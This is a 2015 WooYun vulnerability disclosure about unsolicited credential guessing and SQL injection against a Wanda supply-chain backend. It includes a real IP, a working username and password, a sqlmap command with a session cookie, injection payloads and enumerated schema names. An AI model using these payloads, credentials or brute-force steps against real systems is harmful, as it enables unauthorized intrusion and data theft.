当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-089805

漏洞标题:万达某供应链管理系统问题打包(N多库)

相关厂商:大连万达集团股份有限公司

漏洞作者: 路人甲

提交时间:2015-01-04 10:21

修复时间:2015-02-18 10:22

公开时间:2015-02-18 10:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-04: 细节已通知厂商并且等待厂商处理中
2015-01-04: 厂商已经确认,细节仅向厂商公开
2015-01-14: 细节向核心白帽子及相关领域专家公开
2015-01-24: 细节向普通白帽子公开
2015-02-03: 细节向实习白帽子公开
2015-02-18: 细节向公众公开

简要描述:

想挣点wb好难,走小厂商也就算了,还被忽略。
据我观察万达确认速度好快的,友情测试一下,问题:
1.撞库
2.sql注入

详细说明:

1.撞库
万达百货scm供应链管理后台:
http://124.238.218.78

1月2号0点左右发现问题,撞到一个用户密码,登录看了一下没深入。


1月2号白天,此ip无法访问


1月3号下午,ip可访问,撞到的用户密码成功登录,继续测试发现sql注入


问题说明:
登录该系统时,如果用户名不存在会提示用户不存在,即存在用户名猜解。
研究发现登录时用户名参数为userno,于是猜测是类似员工号之类的数字帐号, 于是从1,11,111,1111,11111,111111测试,发现111111是一个合法用户,于是继续猜测userno为6位数字,于是遍历了111000~119999之间的用户,发现除了111111之外,111093,111150,112759,112983,113163也是存在的用户。
可登录的用户名遍历出了几个,进一步猜测密码。大概1w个请求左右,成功猜出一个用户:
112983,密码123321。停止猜测密码。
该用户登录系统之后的截图:

1.png


2.sql注入
上面的截图中也指出,商品信息的查询功能存在sql注入。

2.png


丢给sqlmap(注意*号前后以及cookie):

c:\Python27>python.exe sqlmap\sqlmap.py -u "http://124.238.218.78/report/spxxcxlb.jsp" --data="spid=&spname=1%27*--&spbarcode=" --cookie="JSESSIONID=0000WgqWKZ-xrpIerR8hmNTirAD:-1; cotreeMenu=300011.300011001.300021001.300021002.300021003.300021004.300021005.300023001.300025001.300025002.300031001.300031002.300031003.300051001.300051002.300051003.300091004.500011004; cstreeMenu=300011001"  --tables --threads=10


一百多张表,枚举了几个之后很无聊暂停了。

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: (custom) POST
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: spid=&spname=1' AND 2564=2564--&spbarcode=
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: spid=&spname=1' UNION ALL SELECT CHR(113)||CHR(109)||CHR(98)||CHR(1
11)||CHR(113)||CHR(86)||CHR(69)||CHR(119)||CHR(119)||CHR(110)||CHR(68)||CHR(84)|
|CHR(84)||CHR(117)||CHR(79)||CHR(113)||CHR(103)||CHR(104)||CHR(114)||CHR(113),NU
LL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- --&spbarcode=
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: spid=&spname=1' AND 2373=DBMS_PIPE.RECEIVE_MESSAGE(CHR(89)||CHR(115
)||CHR(112)||CHR(74),5)--&spbarcode=
---
[13:08:47] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[13:08:47] [WARNING] schema names are going to be used on Oracle for enumeration
 as the counterpart to database names on other DBMSes
[13:08:47] [INFO] fetching database (schema) names
[13:08:47] [WARNING] reflective value(s) found and filtering out
[13:08:47] [WARNING] the SQL query provided does not return any output
[13:08:47] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[13:08:47] [INFO] fetching number of databases
[13:08:47] [INFO] resumed: 112
[13:08:47] [INFO] retrieving the length of query output
[13:08:47] [INFO] retrieved: 6
[13:08:52] [INFO] resuming partial value: CC
[13:08:57] [INFO] retrieved: CCZZHR
[13:08:57] [INFO] retrieving the length of query output
[13:08:57] [INFO] retrieved: 6
[13:09:11] [INFO] retrieved: DBSNMP
[13:09:11] [INFO] retrieving the length of query output
[13:09:11] [INFO] retrieved: 12
[13:09:30] [INFO] retrieved: DBUSRCARD001
[13:09:30] [INFO] retrieving the length of query output
[13:09:30] [INFO] retrieved: 11
[13:09:48] [INFO] retrieved: DBUSRGFC101
[13:09:48] [INFO] retrieving the length of query output
[13:09:48] [INFO] retrieved: 8
[13:09:59] [INFO] retrieved: DBUSRHIS
[13:09:59] [INFO] retrieving the length of query output
[13:09:59] [INFO] retrieved: 7
[13:10:09] [INFO] retrieved: DBUSRHQ
[13:10:09] [INFO] retrieving the length of query output
[13:10:09] [INFO] retrieved: 12
[13:10:27] [INFO] retrieved: DBUSRMKT1101
[13:10:27] [INFO] retrieving the length of query output
[13:10:27] [INFO] retrieved: 12
[13:10:44] [INFO] retrieved: DBUSRMKT1102
[13:10:44] [INFO] retrieving the length of query output
[13:10:44] [INFO] retrieved: 12
[13:11:10] [INFO] retrieved: DBUSRMKT1103
[13:11:10] [INFO] retrieving the length of query output
[13:11:10] [INFO] retrieved: 12
[13:11:29] [INFO] retrieved: DBUSRMKT1201
[13:11:29] [INFO] retrieving the length of query output
[13:11:29] [INFO] retrieved: 12
[13:11:47] [INFO] retrieved: DBUSRMKT1301
[13:11:47] [INFO] retrieving the length of query output
[13:11:47] [INFO] retrieved: 12
[13:12:06] [INFO] retrieved: DBUSRMKT1302
[13:12:06] [INFO] retrieving the length of query output

漏洞证明:

注入不止这一处,建议对后台功能排查一下,毕竟后台都是查询功能。

修复方案:

1.登录加验证码,告知密码泄漏的用户更改密码
2.sql语句不要随便输出。
3.后台查询功能仔细排查注入
4.不知道是有防御动作还是怎么,系统有点脆弱,经常无法访问,希望不是我搞的。我的请求数量最多3~4万。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-01-04 10:31

厂商回复:

感谢路人甲同学的关注与贡献!马上通知业务整改!

最新状态:

暂无